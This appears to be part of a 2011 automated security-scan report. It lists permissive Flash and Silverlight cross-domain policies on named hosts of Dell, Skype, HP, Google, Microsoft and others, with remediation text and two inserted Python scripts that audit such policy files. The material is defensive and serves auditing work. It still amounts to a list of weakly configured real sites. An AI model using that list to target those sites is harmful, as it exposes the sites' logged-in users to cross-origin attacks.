The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: vap1iad2.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: vap1sfo1.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: vap2den1.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: vap2iad1.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: vap3den1.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.cymphonix.com
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:07 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Tue, 06 Jan 2009 07:09:52 GMT
ETag: "30d8758-69-17f87000"
Accept-Ranges: bytes
Content-Length: 105
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.xg4ken.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: accessories.us.dell.com
Response
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 28 May 2009 18:43:47 GMT
Accept-Ranges: bytes
ETag: "2747823cc4dfc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:05 GMT
Connection: close
Content-Length: 364
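Every finding in this section, whether it is reported as "allows access from any domain" or as the wildcard/specific-domain variant, comes down to how the <allow-access-from> entries in crossdomain.xml are written. The script below is an added illustration, not part of the report and not Burp's or any listed vendor's code: it parses a policy body and sorts its entries into the same categories the report uses (any domain, wildcard, specific other domains, specific subdomains), and also picks up secure="false" entries and the site-control setting seen in the ib.adnxs.com response. The three sample policies and the example.com hosts are constructed for the example (only the <allow-access-from domain="*"/> shape is taken from the responses quoted above); review_policy and PolicyReview are names chosen here, and treating a host under the policy's own site as a "subdomain" is this example's convention.

```python
"""Classify a Flash crossdomain.xml into the report's finding categories.

Added example; sample policies are constructed and use example.com hosts.
"""
from dataclasses import dataclass, field
from typing import List, Optional
import xml.etree.ElementTree as ET


@dataclass
class PolicyReview:
    allows_any_domain: bool = False                              # domain="*"
    wildcard_domains: List[str] = field(default_factory=list)    # e.g. *.example.com
    specific_domains: List[str] = field(default_factory=list)    # hosts outside the policy's own site
    subdomains_of_host: List[str] = field(default_factory=list)  # hosts under the policy's own site
    insecure_entries: List[str] = field(default_factory=list)    # secure="false": HTTP origins may read HTTPS content
    header_sources: List[str] = field(default_factory=list)      # allow-http-request-headers-from
    permitted_policies: Optional[str] = None                     # site-control value, if declared

    def finding(self) -> str:
        """Verdict phrased the way the report titles these findings."""
        if self.allows_any_domain:
            return "allows access from any domain"
        parts = []
        if self.wildcard_domains:
            parts.append("uses a wildcard to specify allowed domains")
        if self.specific_domains:
            parts.append("allows access from specific other domains")
        if self.subdomains_of_host:
            parts.append("allows access from specific subdomains")
        return ", ".join(parts) if parts else "grants no cross-domain access"


def review_policy(xml_text: str, policy_host: str) -> PolicyReview:
    """Parse a crossdomain.xml body and classify each allow-access-from entry.

    policy_host is the Host the policy was fetched from; it only serves to tell
    'subdomains of this site' (the site itself or anything under it) apart from
    'other domains'. That split is this example's own convention.
    """
    root = ET.fromstring(xml_text)  # stdlib parser: the DOCTYPE's external DTD is not fetched
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain policy: <%s>" % root.tag)
    site = policy_host.strip().lower()
    review = PolicyReview()

    ctrl = root.find("site-control")
    if ctrl is not None:
        review.permitted_policies = ctrl.get("permitted-cross-domain-policies")

    for entry in root.findall("allow-access-from"):
        domain = (entry.get("domain") or "").strip().lower()
        if not domain:
            continue
        if entry.get("secure", "true").strip().lower() == "false":
            review.insecure_entries.append(domain)
        if domain == "*":
            review.allows_any_domain = True
        elif "*" in domain:
            review.wildcard_domains.append(domain)
        elif domain == site or domain.endswith("." + site):
            review.subdomains_of_host.append(domain)
        else:
            review.specific_domains.append(domain)

    for entry in root.findall("allow-http-request-headers-from"):
        review.header_sources.append((entry.get("domain") or "").strip().lower())
    return review


# Constructed sample policies (not taken from any host in the report).
OPEN_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="*"/>
</cross-domain-policy>"""

WILDCARD_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*.example.com"/>
  <allow-access-from domain="static.example.com" secure="false"/>
  <allow-access-from domain="partner.example.net"/>
</cross-domain-policy>"""

RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com"/>
</cross-domain-policy>"""

if __name__ == "__main__":
    for host, policy in [("cdn.example.com", OPEN_POLICY),
                         ("example.com", WILDCARD_POLICY),
                         ("example.com", RESTRICTED_POLICY)]:
        r = review_policy(policy, host)
        print("%-16s %s" % (host, r.finding()))
        if r.insecure_entries:
            print('    secure="false" on: %s' % ", ".join(r.insecure_entries))
```

The classification mirrors the report's wording on purpose, so the output of a scan over a list of hosts can be compared directly against these findings; a policy that comes back as "grants no cross-domain access" with permitted-cross-domain-policies set to master-only or none is the shape to aim for when a site does not actually need Flash clients on other origins.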
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0
Host: blogs.skype.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0
Host: content-cdn.dell.com
Response
HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 26 Aug 2010 17:13:28 GMT
ETag: "2d593b04245cb1:0"
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:08 GMT
Content-Length: 270
Connection: close
...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0
Host: content.dell.com
Response
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 26 Aug 2010 17:13:28 GMT
Accept-Ranges: bytes
ETag: "2d593b04245cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:09 GMT
Connection: close
Content-Length: 270
...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: disqus.com
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:38 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: embed.technorati.com
Response
HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 05:29:04 GMT
Server: Apache
Last-Modified: Thu, 29 Oct 2009 01:09:39 GMT
ETag: "1d5c40-14f-4770890c33ac0"
Accept-Ranges: bytes
Content-Length: 335
Content-Type: text/xml
Connection: close
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: h30415.www3.hp.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: h30507.www3.hp.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: h41131.www4.hp.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: i.dell.com
Response
HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 19:18:24 GMT
ETag: "040eb3d213cb1:0"
Date: Sun, 04 Sep 2011 16:19:15 GMT
Content-Length: 1152
Connection: close
Cache-Control: public, max-age=604800
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: lt.dell.com
Response
HTTP/1.1 200 OK
Content-Length: 942
Content-Type: text/xml
Last-Modified: Thu, 18 Feb 2010 21:01:46 GMT
Accept-Ranges: bytes
ETag: "bf15fe94ddb0ca1:ed9"
X-Powered-By: ASP.NET
Server: Unauthorized-Use-Prohibited
Date: Sun, 04 Sep 2011 16:18:55 GMT
Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: secure.skypeassets.com
Response
HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 14 Oct 2010 09:18:24 GMT
ETag: "1a2-4929031207800"
Content-Type: application/xml
Content-Language: en
Date: Sun, 04 Sep 2011 18:08:47 GMT
Content-Length: 418
Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0
Host: share.skype.com
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:04:06 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Mon, 04 May 2009 11:41:38 GMT
ETag: "3d9466-173-46914a5288080"
Accept-Ranges: bytes
Content-Length: 371
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0
Host: shop.skype.com
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:08:58 GMT
Server: Apache
Last-Modified: Mon, 15 Feb 2010 12:48:02 GMT
ETag: "36eca8-17c-47fa307142480"
Accept-Ranges: bytes
Content-Length: 380
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www-cdn.dell.com
Response
HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 27 Jun 2008 14:53:19 GMT
ETag: "80997c8965d8c81:0"
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:07 GMT
Content-Length: 370
Connection: close
Cache-Control: max-age=0
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.radware.com
Response
HTTP/1.1 200 OK
Content-Length: 452
Content-Type: text/xml
Last-Modified: Thu, 16 Jun 2011 20:46:30 GMT
Accept-Ranges: bytes
ETag: "3c6a478662ccc1:417"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:18:50 GMT
Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.skype.com
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:14 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 09:18:24 GMT
ETag: "94c00f-1a2-4929031207800"
Accept-Ranges: bytes
Content-Length: 418
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml
Content-Language: en
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.skypeassets.com
Response
HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 14 Oct 2010 09:18:24 GMT
ETag: "1a2-4929031207800"
Content-Type: application/xml
Content-Language: en
Cache-Control: max-age=10800
Date: Sun, 04 Sep 2011 21:04:12 GMT
Content-Length: 418
Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.typepad.com
The application publishes a Flash cross-domain policy which allows access from specific other domains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: cymphonix.app3.hubspot.com
Response
HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 21:47:20 GMT
Accept-Ranges: bytes
ETag: "0e4f34a711c81:111b2"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:19:28 GMT
Connection: close
<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy ...[SNIP]...>
<cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p ...[SNIP]...
5. Silverlight cross-domain policy
There are 8 instances of this issue:
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
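The review step above, for both the Flash crossdomain.xml instances listed earlier and the Silverlight clientaccesspolicy.xml instances that follow, is easier to do consistently with a small checker than by eye. The script below is an added example and is not part of the scanner's output or of any of the listed applications; it parses a crossdomain.xml and a clientaccesspolicy.xml and classifies every allowed origin the way the report wording does (any domain, wildcard, specific domain, specific subdomain), and also flags two attributes the report does not call out: Flash `secure="false"`, which lets an http:// origin use a policy served over https://, and Silverlight `http-request-headers="*"`, which lets cross-domain callers send arbitrary request headers. The two policy documents are constructed samples, the host `www.example.com` is an assumption, and the "site" comparison uses the last two DNS labels without a public-suffix list, which is enough to illustrate the classification.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies for illustration; they are not the policies
# returned by any host listed in the report.
FLASH_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="*.example.com" secure="true"/>
  <allow-access-from domain="partner.example.net"/>
  <allow-access-from domain="cdn.example.com" secure="false"/>
</cross-domain-policy>
"""

SILVERLIGHT_POLICY = """<?xml version="1.0"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>
"""

# Severity order used by worst(): broader grants rank higher.
SEVERITY = {"any": 4, "wildcard": 3, "specific": 2, "subdomain": 1, "self": 0}


def site_of(host):
    """Last two DNS labels of a host. Assumption: no public-suffix handling,
    so hosts under e.g. co.uk would be grouped too coarsely."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify(policy_host, allowed):
    """Classify one allowed origin as any / wildcard / subdomain / specific / self."""
    d = allowed.strip().lower()
    if d == "*":
        return "any"
    if "*" in d:
        return "wildcard"
    # Silverlight uris may carry a scheme and port: https://a.example.com:443
    d = d.split("://", 1)[-1].split("/", 1)[0].split(":", 1)[0]
    if d == policy_host.lower():
        return "self"
    if site_of(d) == site_of(policy_host):
        return "subdomain"
    return "specific"


def audit_flash(policy_host, xml_text):
    """One (domain, kind, insecure) tuple per <allow-access-from>.
    insecure=True means secure="false": an http:// origin may use a policy
    that is served over https://."""
    root = ET.fromstring(xml_text)
    out = []
    for el in root.iter("allow-access-from"):
        dom = el.get("domain", "")
        insecure = el.get("secure", "true").lower() == "false"
        out.append((dom, classify(policy_host, dom), insecure))
    return out


def audit_silverlight(policy_host, xml_text):
    """One (uri, kind, any_headers) tuple per <domain> under <allow-from>.
    any_headers=True means http-request-headers="*": callers may send
    arbitrary request headers cross-domain."""
    root = ET.fromstring(xml_text)
    out = []
    for allow in root.iter("allow-from"):
        any_headers = allow.get("http-request-headers", "") == "*"
        for dom in allow.iter("domain"):
            uri = dom.get("uri", "")
            out.append((uri, classify(policy_host, uri), any_headers))
    return out


def worst(findings):
    """The broadest grant in a policy, or None if it allows nobody."""
    if not findings:
        return None
    return max((kind for _, kind, _ in findings), key=SEVERITY.__getitem__)


if __name__ == "__main__":
    host = "www.example.com"  # assumed policy host
    for dom, kind, flag in audit_flash(host, FLASH_POLICY):
        print(f"crossdomain.xml       {dom:<22} {kind:<10} secure=false: {flag}")
    for uri, kind, flag in audit_silverlight(host, SILVERLIGHT_POLICY):
        print(f"clientaccesspolicy    {uri:<22} {kind:<10} any headers:  {flag}")
    print("worst Flash grant:      ", worst(audit_flash(host, FLASH_POLICY)))
    print("worst Silverlight grant:", worst(audit_silverlight(host, SILVERLIGHT_POLICY)))
```

Run it against the two files fetched from a target (the report's requests show the paths: /crossdomain.xml and /clientaccesspolicy.xml at the site root) and treat any "any" or "wildcard" result as the finding to raise; a "specific" or "subdomain" entry still needs the trust review the remediation text describes, since a compromise of that origin becomes a compromise of this application for any logged-in user.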
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: met1.hp.com
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:48 GMT
Server: Omniture DC/2.0.0
xserver: www385
Connection: close
Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.skype.com
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:13 GMT
Server: Omniture DC/2.0.0
xserver: www285
Connection: close
Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: microsoftsto.112.2o7.net
Response
HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:23:14 GMT
Server: Omniture DC/2.0.0
xserver: www372
Connection: close
Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: nsm.dell.com
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:16 GMT
Server: Omniture DC/2.0.0
xserver: www111
Connection: close
Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com
The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: js.microsoft.com
Response
HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 438904743200000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Mon, 05 Sep 2011 02:23:13 GMT
Content-Length: 572
Connection: close
The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: msdn.microsoft.com
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:23:10 GMT
Connection: keep-alive
Content-Length: 1456
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (TLS; the older SSL protocol versions should no longer be used) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
